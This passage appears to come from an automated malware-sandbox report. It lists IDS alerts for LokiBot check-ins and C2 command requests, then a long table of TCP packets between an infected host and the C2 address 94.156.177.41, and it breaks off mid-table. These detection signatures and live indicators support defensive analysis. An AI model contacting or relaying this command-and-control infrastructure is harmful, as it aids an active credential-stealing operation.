2025-01-11T07:46:21.450794+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:21.450794+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:21.450794+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.345032+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.345032+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50107	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:22.498284+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.228495+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.228495+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50108	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:23.372578+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.079217+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.079217+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50109	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:24.220617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:24.943363+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:24.943363+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50110	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.095420+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.812030+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.812030+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50111	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50112	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50112	94.156.177.41	80	TCP
2025-01-11T07:46:25.958653+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50112	94.156.177.41	80	TCP
2025-01-11T07:46:26.689397+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50112	94.156.177.41	80	TCP
2025-01-11T07:46:26.689397+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50112	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:44:25.587119102 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:25.592071056 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:25.593616009 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:25.594582081 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:25.599438906 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:25.599550009 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:25.604337931 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.317852020 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.317949057 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.318455935 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.319302082 CET	49707	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.323250055 CET	80	49707	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.501728058 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.506650925 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.507323027 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.510052919 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.514852047 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:26.514900923 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:26.520227909 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.217266083 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.217339039 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.217417002 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.217763901 CET	49708	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.222743034 CET	80	49708	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.294572115 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.299592018 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.299679995 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.302273989 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.307110071 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:27.307244062 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:27.312069893 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.030574083 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.030613899 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.030760050 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.030816078 CET	49709	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.035626888 CET	80	49709	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.178946972 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.183830023 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.183897018 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.186079979 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.190958023 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.191010952 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.195859909 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.931834936 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.931890965 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:28.931957960 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.931998014 CET	49711	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:28.936855078 CET	80	49711	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.084412098 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.089307070 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.089381933 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.091341972 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.096199989 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.096261024 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.101052046 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.967045069 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.967072010 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:29.967133999 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.967166901 CET	49713	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:29.972007036 CET	80	49713	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.118011951 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.123081923 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.123176098 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.125305891 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.130115032 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.130805016 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.135610104 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.851399899 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.851512909 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.851524115 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:30.851573944 CET	49714	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:30.856378078 CET	80	49714	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.000783920 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.006160021 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.006242990 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.008527040 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.013349056 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.013402939 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.018199921 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.718381882 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.718410015 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.718507051 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.718507051 CET	49715	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:31.723419905 CET	80	49715	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:31.883291960 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:32.787167072 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:32.787254095 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:32.789330959 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:32.794061899 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:32.794115067 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:32.798878908 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.640239954 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.640283108 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.640345097 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.640645027 CET	49716	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.645435095 CET	80	49716	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.787224054 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.792227030 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.792305946 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.794528961 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.799356937 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:33.799410105 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:33.804955006 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.512341976 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.512578011 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.512626886 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.517513990 CET	49717	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.517549992 CET	80	49717	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.658866882 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.664020061 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.666191101 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.666192055 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.671119928 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:34.671201944 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:34.676017046 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.395987034 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.396044970 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.396140099 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.396141052 CET	49718	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.401113033 CET	80	49718	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.531582117 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.536550045 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.536631107 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.538367987 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.543215990 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:35.543287992 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:35.548235893 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.266621113 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.266665936 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.266782045 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.266782999 CET	49719	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.274508953 CET	80	49719	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.428002119 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.433060884 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.433171034 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.435060024 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.441216946 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:36.441283941 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:36.446219921 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.189220905 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.189336061 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.189450979 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.189450979 CET	49720	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.194439888 CET	80	49720	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.554672956 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.559962988 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.560082912 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.561945915 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.566819906 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:37.566874981 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:37.571719885 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.297092915 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.297122002 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.297473907 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.297473907 CET	49721	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.302401066 CET	80	49721	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.441589117 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.447520018 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.447617054 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.449610949 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.454484940 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:38.454562902 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:38.459389925 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.175416946 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.175442934 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.175539017 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.175539017 CET	49722	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.180409908 CET	80	49722	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.331919909 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.338445902 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.338520050 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.340305090 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.345072985 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:39.345172882 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:39.349987984 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.082995892 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.083173990 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.083235025 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.084038973 CET	49724	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.088757038 CET	80	49724	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.443747044 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.448626995 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.449213982 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.452266932 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.457029104 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:40.457077980 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:40.461868048 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.166259050 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.166274071 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.166479111 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.166480064 CET	49725	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.171363115 CET	80	49725	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.318846941 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.323745012 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.323820114 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.326829910 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.331568956 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:41.331671000 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:41.336467981 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.037022114 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.037117958 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.037120104 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.037190914 CET	49730	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.041925907 CET	80	49730	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.233338118 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.238329887 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.238424063 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.248599052 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.253495932 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.253637075 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.258454084 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.933898926 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.933947086 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:42.934004068 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.934051037 CET	49738	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:42.938868046 CET	80	49738	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.087066889 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.091897011 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.091985941 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.093704939 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.098453999 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.098512888 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.103348017 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.818480968 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.818625927 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.818631887 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.819346905 CET	49743	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.823599100 CET	80	49743	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.968153954 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.972940922 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.973016977 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.975105047 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.979830980 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:43.980050087 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:43.984761000 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.687083006 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.687154055 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.687247038 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.687319994 CET	49749	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.692153931 CET	80	49749	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.838429928 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.845316887 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.845478058 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.847551107 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.852384090 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:44.852549076 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:44.857393980 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.559175014 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.559385061 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.559459925 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.559503078 CET	49755	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.564951897 CET	80	49755	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.716475964 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.721266031 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.721333981 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.723443031 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.728586912 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:45.728632927 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:45.733463049 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.454267979 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.454366922 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.454392910 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.454427958 CET	49761	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.461132050 CET	80	49761	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.598264933 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.603908062 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.603995085 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.606229067 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.611824036 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:46.611946106 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:46.617486954 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.314904928 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.315079927 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.315113068 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.315141916 CET	49771	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.320229053 CET	80	49771	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.458376884 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.463257074 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.463372946 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.465435028 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.470243931 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:47.470300913 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:47.475080967 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:48.185899973 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:48.186011076 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:48.186037064 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:48.186095953 CET	49777	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:44:48.190949917 CET	80	49777	94.156.177.41	192.168.2.5
Jan 11, 2025 07:44:48.331687927 CET	49784	80	192.168.2.5	94.156.177.41
